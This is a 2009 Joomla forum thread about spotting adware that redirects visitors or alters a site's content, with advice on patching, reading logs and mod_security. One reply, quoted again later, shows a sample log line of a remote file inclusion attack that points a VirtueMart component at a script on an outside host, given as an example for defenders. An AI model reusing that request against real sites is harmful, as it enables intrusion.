Malware/Adware/Spyware Browser Redirects and Content Injects

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
ledneonflex
Joomla! Apprentice
Joomla! Apprentice

Malware/Adware/Spyware Browser Redirects and Content Injects

Post by ledneonflex » Fri Jul 31, 2009 5:47 pm

Hi,

What is the best way to determine if your website is a target of malware/adware redirects or website content injections via browser?

We have found PC's in the past that redirect our site to a competitors using the browser and have also found content such as contact details and phone numbers being replaced by competitors.

Any information to help determine this fact would be greatly appreciated. Most often this form of marketing goes by without the site admins detection since it's not server side.

Thanks

Derek

GarfieldLeChat
Joomla! Enthusiast
Joomla! Enthusiast

Re: Malware/Adware/Spyware Browser Redirects and Content Injects

Post by GarfieldLeChat » Sun Aug 02, 2009 7:27 pm

is it a Joomla based site?

Pay a security professional is the answer. some one who will diagnose the problem and fix it and harden up your site secutiry.

oh and I'd pay for some training of your sites admins too as they clearly don't know enough unless this is a virus/trojan related problem in which case you have to have been corportately significant enough to be able to afford security professionals to resolve this.

ledneonflex
Joomla! Apprentice
Joomla! Apprentice

Post by ledneonflex » Sun Aug 02, 2009 7:33 pm

GarfieldLeChat wrote:is it a Joomla based site?

Pay a security professional is the answer. some one who will diagnose the problem and fix it and harden up your site secutiry.

oh and I'd pay for some training of your sites admins too as they clearly don't know enough unless this is a virus/trojan related problem in which case you have to have been corportately significant enough to be able to afford security professionals to resolve this.

It's not server side related, it's the users browser with malicious adware/spyware installed.. I'm asking if anyone knows of a way to test for this kind activity.

Thank you for the feedback though.

GarfieldLeChat
Joomla! Enthusiast
Joomla! Enthusiast

Post by GarfieldLeChat » Wed Aug 05, 2009 5:24 am

ledneonflex wrote:

It's not server side related, it's the users browser with malicious adware/spyware installed.. I'm asking if anyone knows of a way to test for this kind activity.

sorry still don't get what you're driving at this is a joomla help and community forum.

Are you asking is it possible to hijack a brower via malicious code in which case the answers yes. If you are asking if it's possible to tell which browsers come to your site using malcious code then possbily, but you'd need to pay someone to do it. and it would entirely depend on what you were looking for v's the cost of having something bespoke programed.

But this isn't really what these forums are for unless it's joomla related.

ledneonflex
Joomla! Apprentice
Joomla! Apprentice

Post by ledneonflex » Wed Aug 05, 2009 1:14 pm

GarfieldLeChat wrote:
ledneonflex wrote:

sorry still don't get what you're driving at this is a joomla help and community forum.

Are you asking is it possible to hijack a brower via malicious code in which case the answers yes. If you are asking if it's possible to tell which browsers come to your site using malcious code then possbily, but you'd need to pay someone to do it. and it would entirely depend on what you were looking for v's the cost of having something bespoke programed.

But this isn't really what these forums are for unless it's joomla related.

I understand this. I'm asking if anyone knows of any tools that can test if adware/malware/spyware etc.. is targeting your site weather it's Joomla or not. Reason I ask in this forum is that the knowledge here is greater than most other forum and more subscribers.

Thank you for the feedback!

dynamicnet
Joomla! Guru
Joomla! Guru

Post by dynamicnet » Wed Aug 05, 2009 2:42 pm

Greetings:

* Do make sure you've followed the security check list for your joomla installation.

* Make sure your Joomla is up to date; do subscribe to the Joomla security newsletter for new releases based on security updates.

* Do review your web site logs.

In the past few years, most hacks are based on web site injection attacks where the attacker alters the URL (web page / web site address) to include code to inject malware or otherwise test if a site can be compromised.

An example of what you might see for an injection is as follows:

"GET /index.php?option=com_content&task=view&id=572&Itemid=84//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hit168.com.cn/idanyar.txt??? HTTP/1.1" 500 3560 "-" "libwww-perl/5.805" SnXJG0YmP6kAAEcEHMI "-"

* Do ask your hosting provider to use mod_security from http://www.modsecurity.org/ as that can help reduce the number of injections that get through; it is not fool proof, and your provider may have to go through some fine tuning to remove false positives.

Thank you.
Peter M. Abraham
http://www.dynamicnet.net/ - Dynamic Net, Inc. - in business since June 1995; a PCI Compliant, managed hosting provider.

GarfieldLeChat
Joomla! Enthusiast
Joomla! Enthusiast

Post by GarfieldLeChat » Mon Aug 10, 2009 4:05 am

dynamicnet wrote:Greetings:

* Do make sure you've followed the security check list for your joomla installation.

* Make sure your Joomla is up to date; do subscribe to the Joomla security newsletter for new releases based on security updates.

* Do review your web site logs.

In the past few years, most hacks are based on web site injection attacks where the attacker alters the URL (web page / web site address) to include code to inject malware or otherwise test if a site can be compromised.

An example of what you might see for an injection is as follows:

"GET /index.php?option=com_content&task=view&id=572&Itemid=84//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hit168.com.cn/idanyar.txt??? HTTP/1.1" 500 3560 "-" "libwww-perl/5.805" SnXJG0YmP6kAAEcEHMI "-"

* Do ask your hosting provider to use mod_security from http://www.modsecurity.org/ as that can help reduce the number of injections that get through; it is not fool proof, and your provider may have to go through some fine tuning to remove false positives.

Thank you.
see all of this is generic advice which isn't actually what they appear to be asking which seems to be if I've got this right can a site owner tell which infected browsers from a machine or set of machines are visiting their site...

And the answer is specailist bespoke programming not generalised advice i'm afraid.

If your site is being hit with big old attacks focused from a particlar source or sources then it's unlikely that the browser the user is using will affect your machine unless it's being used to directly launch attacks as part of a wider campagin (ie zombie machine). you'll then get an ip address in your log files of that machine and in effect a browser code however you'd be hard pressed to tell which is which without some kind of interpretation and even hard pressed to prove that a user going to your site with malicious code in their browser was doing so knowingly... proving intent will be the downfall...

dynamicnet
Joomla! Guru
Joomla! Guru

Post by dynamicnet » Mon Aug 10, 2009 2:19 pm

Greetings:

I believe my answer dealt specifically with "What is the best way to determine if your website is a target of malware/adware redirects or website content injections via browser?" which is to review the web site logs and that will tell if attacks are incoming.

It is possible I misunderstood the question, and then the answer, of course, would be different.

Thank you.
Peter M. Abraham
http://www.dynamicnet.net/ - Dynamic Net, Inc. - in business since June 1995; a PCI Compliant, managed hosting provider.

ledneonflex
Joomla! Apprentice
Joomla! Apprentice

Post by ledneonflex » Sun Aug 16, 2009 2:35 am

http://en.wikipedia.org/wiki/Cross-site_scripting

Is Joomla 1.0.13 vulnerable to xss?

dynamicnet
Joomla! Guru
Joomla! Guru

Post by dynamicnet » Sun Aug 16, 2009 12:30 pm

Greetings:

If you are not on the current version, then you are vulnerable.

Thank you.
Peter M. Abraham

ledneonflex
Joomla! Apprentice
Joomla! Apprentice

Post by ledneonflex » Mon Aug 17, 2009 3:38 am

Hi.. Yah it's slightly out of date.. we are in the process of upgrading to 1.5.. template is done and revised. Just porting over content and cleaning up the old site and making navigation much better as the old site is horrible.

Should be done soon. Is 1.5 vulnerable to xss? Anyone hear of any issues?

Thanks for all the feedback on this issue. Joomla forums are and always have been my favorite source to information regarding almost anything web related.

dynamicnet
Joomla! Guru
Joomla! Guru

Post by dynamicnet » Mon Aug 17, 2009 3:25 pm

Greetings:

The latest release is clean for XSS attacks as far as I know... but if your security administrator installs mod_security on the server that will help as well.

Thank you.
Peter M. Abraham

Return to “Security in Joomla! 1.5”